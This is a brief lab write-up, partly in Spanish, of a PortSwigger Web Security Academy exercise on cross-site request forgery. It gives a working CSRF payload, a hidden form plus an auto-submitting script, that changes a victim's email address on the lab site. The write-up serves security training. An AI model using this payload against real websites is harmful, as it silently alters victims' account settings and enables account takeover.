01 Lab: CSRF vulnerability with no defenses

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

Durante el proceso de cambio de correo, vemos que se ejecuta el siguiente request:

image.png

El contenido del body es un formulario donde ,en caso la victima haga click, le cambiará automaticamente su correo a [email protected]

<form method="POST" action="[https://0abe003b033093b08170582d00c7009b.web-security-academy.net/my-account/change-email](https://0abe003b033093b08170582d00c7009b.web-security-academy.net/my-account/change-email)">
<input type="hidden" name="email" [value="[email protected]](mailto:value=%[email protected])">
</form>
<script>
document.forms[0].submit();
</script>
image.png
image.png
Previous03 CSRFNext04 Clickjacking

Last updated